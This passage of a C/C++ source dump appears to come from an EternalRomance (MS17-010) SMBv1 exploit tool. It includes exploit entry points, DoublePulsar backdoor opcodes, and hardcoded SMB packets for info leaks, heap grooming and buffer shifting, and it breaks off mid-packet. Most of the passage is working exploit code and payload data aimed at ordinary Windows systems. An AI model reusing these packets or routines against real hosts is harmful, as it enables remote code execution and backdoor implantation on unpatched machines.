361 | BOOLEAN SendRecvLogoffAndx(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
362 |
363 | /*
364 | *
365 | *
366 | *
367 | * Equation Group MS17-10 vulnerability check networking function
368 | *
369 | *
370 | */
371 | //sends transaction PEEK_NMPIPE request on FID 0 and recieves its response
372 | BOOLEAN SendRecvTransPeekNamedPipeCheck(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
373 |
374 |
375 | /*
376 | *
377 | *
378 | *
379 | * Threaded functions
380 | *
381 | *
382 | *
383 | */
384 |
385 | #ifdef _WIN64
386 | INT_PTR __stdcall MainExploitEntry(void);
387 | #else
388 | int __stdcall MainExploitEntry(void);
389 | #endif // _WIN64
390 |
391 |
392 | BOOLEAN __stdcall readfile(UNICODE_STRING* filename, BUFFER* IN OUT filedata);
393 | //BOOLEAN __stdcall writefile(UNICODE_STRING* filename, BUFFER* IN filedata);
394 |
395 |
396 | //DWORD __stdcall EternalRomanceIsVulnerableLeak(PVOID pvip);
397 | //DWORD __stdcall EternalRomanceExploit(PVOID pvip);
398 | //DWORD __stdcall DoublePulsarCheckIsInstalled(PVOID pvip);
399 | //DWORD __stdcall EquationGroupIsVulnerableCheck(PVOID pvip);
--------------------------------------------------------------------------------
/smbmacros.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "windowssocket.h"
3 | #define SMB_MACROS
4 | /*
5 | *
6 | * Smb.Flags Mask defines:
7 | *
8 | */
9 |
10 | #define SMB_FLAGS_LOCK_AND_READ_OK 0x01
11 | #define SMB_FLAGS_BUF_AVAIL 0x2
12 | #define SMB_FLAGS_CASE_INSENSITIVE 0x08
13 | #define SMB_FLAGS_CANONICALIZED_PATHS 0x10
14 | #define SMB_FLAGS_OPLOCK 0x20
15 | #define SMB_FLAGS_REPLY 0x80
16 |
17 | /*
18 | *
19 | *
20 | * Smb Macros
21 | *
22 | *
23 | */
24 |
25 | #define GetSocket(sockptr) \
26 | *(SOCKET *)(sockptr)
27 | #define PutSocket(dest, value) \
28 | *(SOCKET *)(dest) = (value)
29 |
30 | #define GetUshort(src) \
31 | *(WORD *)(src)
32 | #define PutUshort(dst, val) \
33 | *(WORD *)(dst) = (val)
34 |
35 | #define GetUlong(src) \
36 | *(DWORD *)(src)
37 | #define PutUlong(dst, val) \
38 | *(DWORD *)(dst) = (val)
39 |
40 | #define GetUlongPtr(src) \
41 | *(DWORD_PTR*)(src)
42 | #define PutUlongPtr(dst, val) \
43 | *(DWORD_PTR *)(dst) = (val)
44 |
45 | #define GetUlonglong(src) \
46 | *(ULONGLONG*)(src)
47 | #define PutUlonglong(dest, value) \
48 | *(ULONGLONG *)(dest) = (value)
49 |
50 | #define GetUnsigned(src) \
51 | *(unsigned *)(src)
52 | #define PutUnsigned(dst, val) \
53 | *(unsigned *)(dst) = (val)
54 |
55 |
56 | #define byteswap16(value) \
57 | ((WORD)((((value) >> 8) & 0xFF) | (((value) & 0xFF) << 8)))
58 | #define byteswap32(value) \
59 | ((((value) & 0xFF000000) >> 24) | (((value) & 0x00FF0000) >> 8) | (((value) & 0xFF00) << 8) | (((value) & 0xFF) << 24))
60 | #define byteswap64(value) \
61 | ((((value) & 0xFF00000000000000ULL) >> 56) \
62 | | (((value) & 0x00FF000000000000ULL) >> 40) \
63 | | (((value) & 0x0000FF0000000000ULL) >> 24) \
64 | | (((value) & 0x000000FF00000000ULL) >> 8) \
65 | | (((value) & 0x00000000FF000000ULL) << 8) \
66 | | (((value) & 0x0000000000FF0000ULL) << 24) \
67 | | (((value) & 0x000000000000FF00ULL) << 40) \
68 | | (((value) & 0x00000000000000FFULL) << 56))
69 |
70 | #define badsock(sfd) \
71 | ((BOOLEAN)((sfd) == INVALID_SOCKET) ? TRUE : FALSE)
72 | #define validsock(sfd) \
73 | ((BOOLEAN)((sfd) != INVALID_SOCKET) ? TRUE : FALSE)
74 |
75 | #define isnull(x) \
76 | ((BOOLEAN)((x) == NULL) ? TRUE : FALSE)
77 | #define notnull(x) \
78 | ((BOOLEAN)((x) != NULL) ? TRUE : FALSE)
79 |
80 | #define issockerr(status) \
81 | ((BOOLEAN)((status) == SOCKET_ERROR) ? TRUE : FALSE)
82 |
83 | #define MAKEUNSIGNED(x) \
84 | ((unsigned)(x))
85 | #define MAKEPBYTE(x) \
86 | ((PBYTE)(x))
87 | #define MAKEPSMB(x) \
88 | ((PSMB_HEADER)(x))
89 | #define MAKEPWSTR(x) \
90 | ((PWSTR)(x))
91 | #define MAKEPCWSTR(x) \
92 | ((PCWSTR)(x))
93 | #define MAKEPWORD(x) \
94 | ((WORD *)(x))
95 | #define MAKEPDWORD(x) \
96 | ((DWORD *)(x))
97 | #define MAKEPVOID(x) \
98 | ((PVOID)(x))
99 | #define MAKESIZET(x) \
100 | ((SIZE_T)(x))
101 |
102 | #define errmsg(func, line, err) \
103 | (fwprintf_s(stderr, __LPREFIX("[-] function %S failed on line %u with error 0x%08X\n"), func, MAKEUNSIGNED(line), MAKEUNSIGNED(err)))
104 | #define _dbgprint(fmt, ...) \
105 | (fwprintf_s(stdout, __LPREFIX(fmt), __VA_ARGS__))
106 | #define dbgprint(fmt, ...) \
107 | (fwprintf_s(stderr, __LPREFIX(fmt), __VA_ARGS__))
108 |
109 |
110 | #define STATUS_FAIL 0xC0000001
111 |
112 | #define SMB_COM_NEGOTIATE 0x72
113 | #define SMB_COM_SESSION_SETUP_ANDX 0x73
114 | #define SMB_COM_TREE_CONNECT 0x75
115 | #define SMB_COM_TRANS 0x25
116 | #define SMB_COM_TRANS_SECONDARY 0x26
117 | #define SMB_COM_TRANS2 0x32
118 | #define SMB_COM_TRANS2_SECONDARY
119 | #define SMB_COM_NT_TRANS 0xa0
120 | #define SMB_COM_NT_CREATE_ANDX 0xa2
121 | #define SMB_COM_WRITE_ANDX 0x2f
122 |
123 | #define NETBIOS_SIZE_OFFSET 2U
124 | #define SMB_HEADER_OFFSET 4U
125 | #define SMB_PARAM_OFFSET 36
126 | #define TREE_CONNECT_ANDX_UNC_OFFSET 48
127 | #define TREE_CONNECT_ANDX_SVC "?????"
128 | #define TREE_CONNECT_ANDX_SVC_SIZE 6
129 | #define TREE_CONNECT_ANDX_SVC_LEN 5
130 |
131 | #define DOPU_PING_OPCODE 0x23
132 | #define DOPU_EXEC_OPCODE 0xC8
133 | #define DOPU_KILL_OPCODE 0x77
134 |
135 | #define DOPU_ERROR_SUCCESS 0x10
136 | #define DOPU_ERROR_ALLOCATION 0x30
137 | #define DOPU_ERROR_PARAMETERS 0x20
138 |
139 | #define NT_STATUS_SUCCESS 0x00000000
140 | #define NT_STATUS_INVALID_SMB 0x00010002
141 | #define NT_STATUS_SMB_BAD_TID 0x00050002
142 | #define NT_STATUS_SMB_BAD_UID 0x005b0002
143 | #define NT_STATUS_NOT_IMPLEMENTED 0xC0000002
144 | #define NT_STATUS_INVALID_DEVICE_REQUEST 0xC0000010
145 | #define NT_STATUS_NO_SUCH_DEVICE 0xC000000e
146 | #define NT_STATUS_NO_SUCH_FILE 0xC000000f
147 | #define NT_STATUS_MORE_PROCESSING_REQUIRED 0xC0000016
148 | #define NT_STATUS_INVALID_LOCK_SEQUENCE 0xC000001e
149 | #define NT_STATUS_INVALID_VIEW_SIZE 0xC000001f
150 | #define NT_STATUS_ALREADY_COMMITTED 0xC0000021
151 | #define NT_STATUS_ACCESS_DENIED 0xC0000022
152 | #define NT_STATUS_OBJECT_NAME_NOT_FOUND 0xC0000034
153 | #define NT_STATUS_OBJECT_NAME_COLLISION 0xC0000035
154 | #define NT_STATUS_OBJECT_PATH_INVALID 0xC0000039
155 | #define NT_STATUS_OBJECT_PATH_NOT_FOUND 0xC000003a
156 | #define NT_STATUS_OBJECT_PATH_SYNTAX_BAD 0xC000003b
157 | #define NT_STATUS_PORT_CONNECTION_REFUSED 0xC0000041
158 | #define NT_STATUS_THREAD_IS_TERMINATING 0xC000004b
159 | #define NT_STATUS_DELETE_PENDING 0xC0000056
160 | #define NT_STATUS_PRIVILEGE_NOT_HELD 0xC0000061
161 | #define NT_STATUS_LOGON_FAILURE 0xC000006D
162 | #define NT_STATUS_DFS_EXIT_PATH_FOUND 0xC000009b
163 | #define NT_STATUS_MEDIA_WRITE_PROTECTED 0xC00000a2
164 | #define NT_STATUS_ILLEGAL_FUNCTION 0xC00000af
165 | #define NT_STATUS_FILE_IS_A_DIRECTORY 0xC00000BA
166 | #define NT_STATUS_FILE_RENAMED 0xC00000D5
167 | #define NT_STATUS_REDIRECTOR_NOT_STARTED 0xC00000fb
168 | #define NT_STATUS_DIRECTORY_NOT_EMPTY 0xC0000101
169 | #define NT_STATUS_PROCESS_IS_TERMINATING 0xC000010a
170 | #define NT_STATUS_TOO_MANY_OPENED_FILES 0xC000011f
171 | #define NT_STATUS_CANNOT_DELETE 0xC0000121
172 | #define NT_STATUS_FILE_DELETED 0xC0000123
173 | #define NT_STATUS_INSUFF_SERVER_RESOURCES 0xC0000205
174 |
175 |
--------------------------------------------------------------------------------
/smbpacketstrings.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #define NEGOTIATE_PACKET "\x00\x00\x00\x85\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc0" \
3 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" \
4 | "\x00\x00\x40\x00\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f" \
5 | "\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02" \
6 | "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f" \
7 | "\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70" \
8 | "\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30" \
9 | "\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54" \
10 | "\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"
11 |
12 | #define NEGOTIATE_PACKET_SIZE 137
13 |
14 |
15 | #define SESSION_SETUP_ANDX_PACKET "\x00\x00\x00\x88\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc0" \
16 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" \
17 | "\x00\x00\x40\x00\x0d\xff\x00\x88\x00\x04\x11\x0a\x00\x00\x00\x00" \
18 | "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x4b" \
19 | "\x00\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00" \
20 | "\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00" \
21 | "\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6e\x00" \
22 | "\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00" \
23 | "\x30\x00\x20\x00\x35\x00\x2e\x00\x30\x00\x00\x00"
24 |
25 | #define SESSION_SETUP_ANDX_PACKET_SIZE 140
26 |
27 |
28 | #define TREE_CONNECT_ANDX_PACKET "\x00\x00\x00\x5a\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc0" \
29 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" \
30 | "\x00\x08\x40\x00\x04\xff\x00\x5a\x00\x08\x00\x01\x00\x2f\x00\x00" \
31 | "\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00\x2e\x00\x32\x00\x33\x00" \
32 | "\x2e\x00\x33\x00\x33\x00\x2e\x00\x31\x00\x30\x00\x5c\x00\x49\x00" \
33 | "\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f\x3f\x00"
34 |
35 | #define TREE_CONNECT_ANDX_PACKET_SIZE 94
36 |
37 |
38 | #define NT_CREATE_ANDX_PACKET "\x00\x00\x00\x62\xff\x53\x4d\x42\xa2\x00\x00\x00\x00\x18\x07\xc0" \
39 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe" \
40 | "\x00\x08\x40\x00\x18\xff\x00\x62\x00\x00\x0c\x00\x16\x00\x00\x00" \
41 | "\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
42 | "\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00" \
43 | "\x02\x00\x00\x00\x03\x0f\x00\x00\x6c\x00\x73\x00\x61\x00\x72\x00" \
44 | "\x70\x00\x63\x00\x00\x00"
45 |
46 |
47 | #define NT_CREATE_ANDX_PACKET_SIZE 102
48 |
49 |
50 | #define TRANS_DCERPC_BIND_PACKET "\x00\x00\x00\x9c\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0" \
51 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe" \
52 | "\x00\x08\x40\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x08" \
53 | "\x00\xe8\x03\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02" \
54 | "\x00\x26\x00\x00\x40\x59\x00\x00\x5c\x00\x50\x00\x49\x00\x50\x00" \
55 | "\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00\x0b\x03\x10\x00\x00\x00" \
56 | "\x48\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00" \
57 | "\x01\x00\x00\x00\x00\x00\x01\x00\x78\x57\x34\x12\x34\x12\xcd\xab" \
58 | "\xef\x00\x01\x23\x45\x67\x89\xab\x00\x00\x00\x00\x04\x5d\x88\x8a" \
59 | "\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00"
60 |
61 |
62 | #define TRANS_DCERPC_BIND_PACKET_SIZE 160
63 |
64 |
65 | #define WRITE_ANDX_LSARPC_GET_USERNAME_PACKET "\x00\x00\x02\x98\xff\x53\x4d\x42\x2f\x00\x00\x00\x00\x18\x07\xc0" \
66 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe" \
67 | "\x00\x08\x40\x00\x0e\xff\x00\x40\x00\x00\x40\x00\x00\x00\x00\xff" \
68 | "\xff\xff\xff\x08\x00\x58\x02\x00\x00\x58\x02\x40\x00\x00\x00\x00" \
69 | "\x00\x59\x02\x00\x05\x00\x00\x03\x10\x00\x00\x00\x58\x02\x00\x00" \
70 | "\x01\x00\x00\x00\x40\x02\x00\x00\x00\x00\x2d\x00\x48\x86\x0e\x00" \
71 | "\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \
72 | "\x78\x96\x31\x00\x10\x02\x10\x02\x68\xf5\x11\x00\x08\x01\x00\x00" \
73 | "\x00\x00\x00\x00\x08\x01\x00\x00\xd9\x38\xed\x8e\x3d\x8d\xc1\x85" \
74 | "\x3d\x1f\xa1\x55\xe4\xac\x1c\x7b\xbe\x0a\xd8\x09\x0d\x88\x14\x39" \
75 | "\xaa\x88\x7a\x2b\x71\x3f\x79\xe2\xe6\x02\x00\x39\xf6\x0a\xdd\xec" \
76 | "\x7e\x0d\x83\x62\x8b\xa2\x83\x63\xd9\xd1\x7e\x5a\xaf\xb4\xe1\x52" \
77 | "\x84\x9a\x21\x53\x8d\x86\xd0\x45\xaa\x85\x4c\x0b\xc3\xaf\x4e\xee" \
78 | "\x1f\x4c\x27\x0a\xb9\xf6\xec\xeb\x16\x30\x5f\xf0\xae\x4d\xd7\xac" \
79 | "\x6e\x0e\xf8\xeb\x50\xf1\x7b\x76\xa5\x83\xcd\x4f\x01\xa6\xd5\x87" \
80 | "\x69\x3e\xa4\x4b\xb7\x13\x55\x61\xc9\x6e\xea\xb8\x7d\x3f\x6a\x27" \
81 | "\x04\x4a\x0a\x15\x94\x2f\xaa\x27\xfe\xc4\x68\x9a\x36\xa2\x9b\x7e" \
82 | "\x4d\x50\xf7\x6a\xf2\xef\x1f\xdc\xec\xd7\x77\xeb\xb3\x02\x78\x6c" \
83 | "\x8d\xbe\x49\x3c\x5c\x78\xf2\xd4\x85\x1a\xe8\xc6\x0d\xdc\x32\x5e" \
84 | "\x65\xf4\x08\xf5\x01\x05\x16\x3b\x25\xc0\x47\x09\x10\x94\x45\xec" \
85 | "\xf5\xe2\x8e\x11\xd2\x8d\x55\xbf\xb2\x5e\x02\xf8\x5b\x17\x92\x7c" \
86 | "\xf3\xa6\xa3\xc2\xa2\x5b\x6e\x25\xbd\x87\x82\xda\x7e\x7b\x80\xdf" \
87 | "\xd2\x34\x9c\x8e\x48\xb6\x37\xf3\xa3\x72\x51\x9c\x1d\x9e\x1d\xf5" \
88 | "\xe0\xea\x7f\xef\xbd\x7b\xc0\x09\xaa\x92\x37\x6e\x0d\xc6\x3d\x48" \
89 | "\x63\x3b\x1d\xf4\x3a\xc3\x6a\x44\x21\x3f\x5b\x65\x77\x42\x9b\xae" \
90 | "\xbd\x4a\x3a\xe1\x5f\x7b\x10\x1d\x85\x4d\x60\x1c\xf6\x0a\xf9\xed" \
91 | "\x8c\x88\xa4\xce\x4b\x0c\x22\x4b\x9b\xb6\x8a\x4f\xb6\x5e\x3e\x54" \
92 | "\xc5\x5a\x5a\x47\xc0\xf7\xc9\x60\x94\x2f\xda\x83\x99\x67\x99\x61" \
93 | "\xdb\xb2\xa9\xed\x43\x73\x01\x6c\x29\xd0\x32\x9f\x4f\xd5\x9e\x5c" \
94 | "\xd9\xb5\x4d\x16\x3d\x13\xbe\x99\xc0\xb3\x70\x8d\x7e\x82\x6a\xfb" \
95 | "\x85\x57\x8f\x6c\x17\x5f\x0c\xd1\x8a\x90\x91\xdf\xdd\x10\xbd\x02" \
96 | "\x81\xfe\x69\x8d\x5d\x7b\x2b\x57\x9f\x60\xd1\x69\x57\x89\x21\xde" \
97 | "\x69\x1f\xa1\xab\xe0\xc1\xb3\x6d\x26\xfd\xca\xe4\x26\x02\x04\x4b" \
98 | "\xf1\xe1\xed\x30\xd0\x64\xb2\xf1\x6c\xc3\x94\x8e\xfb\x34\xdc\xf1" \
99 | "\x0b\xba\x10\x56\xe1\x10\xcc\xfc\x0c\x2b\xe8\xc9\x17\x25\x44\x04" \
100 | "\x01\x11\xfd\xcd\x6b\x8a\x5e\x85\x09\x71\x3b\xbc\x6c\xc0\x1e\xe5" \
101 | "\x9a\xdf\xf6\x5c\x86\x4e\x98\xff\xf3\x31\xe1\xf3\xc2\x7c\xb5\xc2" \
102 | "\x34\x4a\xa9\x7c\x2d\x32\xa2\xfa\x03\x07\x2d\xfc\xd2\xf4\xd7\x34" \
103 | "\xea\x4c\x55\xf9\x5f\x02\xbc\xc2\x3d\x31\x90\x0d\x66\x90\xfa\xe2" \
104 | "\xb1\x4e\xe7\x98\x3d\x27\x5b\x00\x8e\x2b\xba\x9d\x7d\x1e\x5a\x1e" \
105 | "\x7a\xca\x18\xaf\x29\x3d\x49\x58\xef\x54\xb9\x0a\x67\x75\x1a\x88" \
106 | "\x4c\xea\x94\xc9\xe9\xbe\xc9\x0c\x00\x00\x00\x00"
107 |
108 |
109 | #define WRITE_ANDX_LSARPC_GET_USERNAME_PACKET_SIZE 668
110 |
111 |
112 | #define TRANS_FIRST_LEAK_TRIGGER_PACKET "\x00\x00\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0" \
113 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
114 | "\x00\x08\x40\x00\x10\x00\x00\x00\x00\x00\x54\x01\x00\x00\x00\x00" \
115 | "\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02" \
116 | "\x00\x23\x00\x00\x40\x00\x00"
117 |
118 |
119 | #define TRANS_FIRST_LEAK_TRIGGER_PACKET_SIZE 71
120 |
121 | #define TRANS_GROOM_PACKET_TYPE_ONE "\x00\x00\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0" \
122 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
123 | "\x00\x08\x41\x00\x10\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00" \
124 | "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02" \
125 | "\x00\x36\x00\x00\x40\x00\x00"
126 |
127 | #define TRANS_GROOM_PACKET_TYPE_ONE_SIZE 71
128 |
129 | #define TRANS_MULTI_REQUEST_PACKET_TYPE_ONE "\x00\x00\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0" \
130 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
131 | "\x00\x08\x4b\x00\x10\x00\x00\x01\x00\x00\x54\x01\x00\x00\x00\x00" \
132 | "\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02" \
133 | "\x00\x23\x00\x00\x40\x00\x00\x00\x00\x00\x43\xff\x53\x4d\x42\x25" \
134 | "\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
135 | "\x00\x00\x00\x00\x08\x0b\x28\x00\x08\x00\x40\x10\x00\x00\x00\x54" \
136 | "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \
137 | "\x00\x00\x00\x00\x00\x00\x02\x00\x36\x00\x00\x40\x00\x00\x00\x00" \
138 | "\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0\x00\x00" \
139 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08" \
140 | "\x4c\x00\x10\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x01" \
141 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x36" \
142 | "\x00\x00\x40\x00\x00"
143 |
144 |
145 | #define TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_SIZE 213
146 |
147 |
148 | #define TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_NUMBER_TWO "\x00\x00\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0" \
149 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
150 | "\x00\x08\x4d\x00\x10\x00\x00\x01\x00\x00\x54\x01\x00\x00\x00\x00" \
151 | "\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02" \
152 | "\x00\x23\x00\x00\x40\x00\x00\x00\x00\x00\x43\xff\x53\x4d\x42\x25" \
153 | "\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
154 | "\x00\x00\x00\x00\x08\x0a\x28\x00\x08\x00\x40\x10\x00\x00\x00\x54" \
155 | "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \
156 | "\x00\x00\x00\x00\x00\x00\x02\x00\x36\x00\x00\x40\x00\x00\x00\x00" \
157 | "\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0\x00\x00" \
158 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08" \
159 | "\x4e\x00\x10\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x01" \
160 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x36" \
161 | "\x00\x00\x40\x00\x00"
162 |
163 |
164 | #define TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_NUMBER_TWO_SIZE 213
165 |
166 | #define TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_NUMBER_THREE "\x00\x00\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0" \
167 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
168 | "\x00\x08\x4f\x00\x10\x00\x00\x01\x00\x00\x54\x01\x00\x00\x00\x00" \
169 | "\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02" \
170 | "\x00\x23\x00\x00\x40\x00\x00\x00\x00\x00\x43\xff\x53\x4d\x42\x25" \
171 | "\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
172 | "\x00\x00\x00\x00\x08\x09\x28\x00\x08\x00\x40\x10\x00\x00\x00\x54" \
173 | "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \
174 | "\x00\x00\x00\x00\x00\x00\x02\x00\x36\x00\x00\x40\x00\x00\x00\x00" \
175 | "\x00\x43\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0\x00\x00" \
176 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08" \
177 | "\x50\x00\x10\x00\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x01" \
178 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x36" \
179 | "\x00\x00\x40\x00\x00"
180 |
181 | #define TRANS_MULTI_REQUEST_PACKET_TYPE_ONE_NUMBER_THREE_SIZE 213
182 |
183 |
184 | #define TRANS_GROOM_PACKET_TYPE_TWO "\x00\x00\x00\x3f\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc0" \
185 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
186 | "\x00\x08\x51\x00\x0e\x00\x00\x40\x00\x40\x09\x00\x00\x00\x00\x00" \
187 | "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
188 | "\x00\x00\x00"
189 |
190 | #define TRANS_GROOM_PACKET_TYPE_TWO_SIZE 67
191 |
192 |
193 | #define TRANS_SECONDARY_LEAK_TWO_TRIGGER_PACKET "\x00\x00\x00\x43\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
194 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
195 | "\x00\x08\x4b\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" \
196 | "\x00\x42\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
197 | "\x00\x00\x00\x00\x00\x00\x11"
198 |
199 | #define TRANS_SECONDARY_LEAK_TWO_TRIGGER_PACKET_SIZE 71
200 |
201 |
202 | #define WRITE_ANDX_INDATA_SHIFT_PACKET "\x00\x00\x02\x3c\xff\x53\x4d\x42\x2f\x00\x00\x00\x00\x18\x07\xc0" \
203 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0b\x28" \
204 | "\x00\x08\x00\x40\x0c\xff\x00\x3c\x00\x00\x40\x00\x00\x00\x00\xff" \
205 | "\xff\xff\xff\x04\x00\x00\xfe\x00\x00\x00\x02\x3b\x00\x00\x02\x00" \
206 | "\x46\xc5\x98\xb4\x9b\xba\xcd\x08\x28\x51\xc4\x88\xa1\x7e\xef\x76" \
207 | "\xfb\xa7\xd3\x99\x5e\x6a\xda\x6e\xa9\xaf\x35\x1b\xae\x96\x3c\xf9" \
208 | "\xd1\x3e\x31\xde\x2e\xf5\xd3\x12\xe8\xd9\xa0\x1b\xe2\x68\x3a\x3c" \
209 | "\x66\x17\xcb\xde\xfd\x6a\xd8\xbc\x1b\x9e\x67\x0c\xbd\x65\xe7\x72" \
210 | "\xaa\xc6\xb3\x0d\x7c\xa0\xa9\x52\x19\xdc\xb3\x16\xc9\xd4\xaf\x7c" \
211 | "\x85\xff\x92\x13\xb7\x59\x48\xf7\xfe\xa5\x18\x2b\x3b\xfa\x0f\x08" \
212 | "\x72\xb9\x4c\xf0\xb7\x62\x97\x2c\xcc\x5d\x30\x22\x99\x33\x37\xb3" \
213 | "\x21\x4d\x9c\x1a\x23\xb2\xf9\xf4\x09\xdc\x3f\xd7\x51\x1a\xa5\x2b" \
214 | "\x14\x98\xb6\x9e\xdb\x8b\xf0\xed\x5e\x8a\xd0\x4e\x5f\xa0\xc7\x48" \
215 | "\x45\x18\xe6\x3f\xa0\x99\xbf\x76\x3c\x84\x59\xd3\xee\x33\x9e\x36" \
216 | "\xc1\x0f\x31\x97\xab\x13\x0b\xc9\x74\xb8\xd7\x15\xf1\xdb\x5a\x89" \
217 | "\x48\x9f\xf4\x36\x55\xd9\x79\x22\xde\x06\x6e\x4d\xcb\x5a\xfb\x6a" \
218 | "\xf2\xef\x84\xc1\xb1\x98\x4c\xdb\xf7\x62\x0d\x57\xeb\x4d\xf3\xac" \
219 | "\xc9\x48\xd1\x18\x30\xe6\x0a\x8b\x80\xf1\x0b\xda\x6b\x4d\xc3\xf3" \
